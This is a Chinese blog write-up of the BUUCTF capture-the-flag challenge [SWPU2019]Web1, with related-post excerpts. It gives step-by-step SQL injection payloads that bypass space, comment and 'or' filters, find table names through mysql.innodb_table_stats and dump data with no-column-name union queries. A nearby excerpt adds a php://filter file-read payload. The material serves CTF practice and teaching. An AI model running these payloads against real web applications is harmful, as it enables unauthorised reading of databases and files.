buuctf [SWPU2019]Web1 1

最新推荐文章于 2024-05-14 23:43:15 发布
最新推荐文章于 2024-05-14 23:43:15 发布
阅读量1.6k 收藏 9
点赞数 3
分类专栏: ctf buuctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/114748031
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏

buuctf [SWPU2019]Web1 1 sql 无列名注入 二次注入

注册登录发布广告
在这里插入图片描述

1'测试
在这里插入图片描述

存在sql注入
经测试,or,空格,#被过滤
在这里插入图片描述
在这里插入图片描述

不能用order by测试列数,用group by代替
注释符#用,'3代替,数字随便
(这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?)
空格用/**/代替

1'/**/group/**/by/**/22,'3

在这里插入图片描述

1'/**/group/**/by/**/23,'3

在这里插入图片描述

所以有22列

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

回显位2和3

在这里插入图片描述

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

information_schema.tables用mysql.innodb_table_stats代替
table_schema用database_name代替(为什么不能用前者呢?是因为数据库类型不同吗?有无懂哥?)
在这里插入图片描述
这时就要无列名注入了
因为没有mysql.innodb_column_stats这个方法,查不了列名
大概原理就是没有列名,那就给它取名,然后按别名正常继续注入

//-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

待我慢慢给你讲
首先有两个表ads,users。flag在users表第三列,其他可以自己注入看看。
格式

select group_concat(b) from (select 1,2 as b,3 union select * from users)a

a,b为别名,可以乱取。b别名为users表第二列别名。
select 1,2,3 很熟悉吧,就是上面我们用来判断回显的payload。有基础的都知道在数据库中这样会显示三列分别为1,2,3(为什么我不上图?别问,问就是懒。),而1,2,3就是三列列名
select 1,2,3 union select * from users就会以1,2,3为列名,查询users表中的内容了。就这么简单。为什么这样的语句结果就会这样?那就涉及数据库怎么底层了,懂得都懂,懂的不必说,不懂的很难说,反正我是不懂的,呵呵。
回到正题,在加上前面select group_concat(b)就是查询users表第二列。
那为什么是1,2,3没有4,5,6或以上呢。因为users表就只有三列,多输入列数就报错了。
可以用下面payload取得列数

-1'/**/union/**/select/**/1,(select/**/group_concat(1)/**/from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

有多少个1就有多少列。
最后就是ads表了,这个是查不出来的。
用上面的语句查出来有3列,当你爆查询表里面的内容时会报错,回头看之前的就变成了4个1,变成4列,再爆,再报错,再回头看,5列。。。真是不能满足我小小的好奇心,气死人了

__byb__
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
[SWPU2019]Web1
weixin_45577185的博客
09-12 502
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
[SWPU2019]Web1(无列名注入)
paidx0
08-30 387
每天一题,记录学习 题目有几个地方把我坑惨了,哈哈哈 首先试了一下注册一个admin账号,然后就发现admin已经被注册 然后就开始试了一堆admin的密码进行爆破,人傻了,考点压根就不在这。 直接注册一个号进去看看 发布广告的位置又让我想起了 XSS,然后就又上当了 其实这是一道SQL注入的题目,太坑了吧 通过简单的测试,过滤了空格,or,and,--+,#等等 因为这里过滤了 or,所以information_schema库自然是也用不成了,所以就用到了无列名的注入方式 具体用法可以看看我的另
web buuctf [SWPU2019]Web1
weixin_44214568的博客
04-06 400
考点:无列名注入 1. 登录界面和注册界面,发现admin账号被注册了,fuzz也没爆出密码来;尝试注入,dirsearch也没东西,源码上也没啥东西 最后注册了一个账号,登录进去 随便填了填,申请过去 这是广告详情 看url上有个id,尝试着注入,也没发现啥问题,没有地方报错 2.在广告申请栏的标题注入1',在查看广告详情 fuzz,发现or和空格都被过滤了,#和--+也过滤了 没法用order by 空格我们可以用/**/绕过 3.在标题处注入1'/*...
CTF例题:[SWPU2019]Web1(无列名注入)
最新发布
qq_64395221的博客
05-14 920
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)as a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/&&/**/’1‘=’1---查出users的列名,但没有想要的信息。进入题目后发现有登录和注册接口,直接注册登录。
BUUCTF: [SWPU2019]Web1
末初的CSDN博客
09-25 696
登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如。但是因为没有字段信息可以查,使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入,尝试在广告名处输入单引号。,发布的时候并没有任何反应,发布后有个。尝试联合查询、首先需要判断有多少字段,直接报错了,基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明,因为这里过滤。
buuctf-[SWPU2019]Web1(小宇特详解)
小宇的web博客
02-26 1600
buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示标题有敏感词汇 这里没有源码只能去手动的测试他过滤了啥 最终我发现了她过滤了or # --+和空格 这里想一下绕过的方法 空格可以用/**/来代替 –+注释符的话就用单引号闭合就o
BUUCTF:[SWPU2019]Web1
qq_46230755的博客
12-27 494
一个登录页面,先去试着注册一个账号 老样子试图注册admin,发现用户已存在 那先随便注册个123 123进去 然后申请一下发布广告 发现实现了一个留言板的功能,考虑一下有没有存在注入的可能。 申请一个1’发现存在着回显 fuzz一下,可以发现过滤挺多东西的。比如空格我们可以用/**/替代导致无法使用information_schema库,我们可以通过无列名注入 构造payload -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14.
BUUCTF [SWPU2019] Web3
Senimo
12-20 810
BUUCTF [SWPU2019] Web3 考点: 启动环境: 首先是一个登陆页面,标题为:CTF-Flask-Demo,推测其应为Flask所编写,尝试使用admin用户登陆: 用户名:admin、密码:admin,登陆成功: 又尝试了几个登陆密码,应该是没有验证,随便登陆 其中有文件上传功能,点击upload: 提示权限不足,考虑其为session判断权限,使用BurpSuite查看页面Cookie信息: 注:在Flask中,session是保存在Cookie中,也就是本地,所以可以直接读取其内
[BUUCTF][SWPU2019]Web1
朋克归零膏的博客
10-28 560
无列名注入fuzz过滤词绕过空格。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
Jlink驱动文件1.rar
06-04
本压缩包文件"Jlink驱动文件1.rar"包含的是JLink驱动的9.40版本,这是一个针对JLink设备的最新更新。版本号9.40意味着此驱动可能包含了对先前版本的一些修复、性能优化或新特性的添加。对于开发者来说,及时更新驱动...
SWPU大数据概论课程报告
01-31
《SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
swpu前端实验4的实验
04-23
课程:Web前端应用开发实验 项目:jQuery基础应用 成绩: 专业班级: 班内序号: 指导教师:杨云 姓名: 学号: 实验日期: 实验目的及要求: 1. 掌握jQuery页面初始化方法:在网页加载完成后执行特定的操作,如...
buuctf [强网杯 2019]随便注 1
热门推荐
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql注入题。 输入 1' or 1=1;# 这个#用来注释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
[ACTF2020 新生赛]Include 1
weixin_45642610的博客
01-10 8894
[ACTF2020 新生赛]Include1 -刷题个人日记 小白一个,写给自己看。 打开后是这样: 点击tips后: ctrl+u查看网页代码+抓包:没有发现什么有用的信息。 查看题目和网址的file参数,提示这是文件包含的题 构造payload: file=php://filter/read=convert.base64-encode/resource=flag.php 读出源码,进行base64解码得出flag: flag{ef7e62e5-5ed4-4f53-8c7c-fb80aaabf7cc}
BUUCTF [极客大挑战 2019]PHP 1
weixin_45642610的博客
01-14 5304
BUUCTF [极客大挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值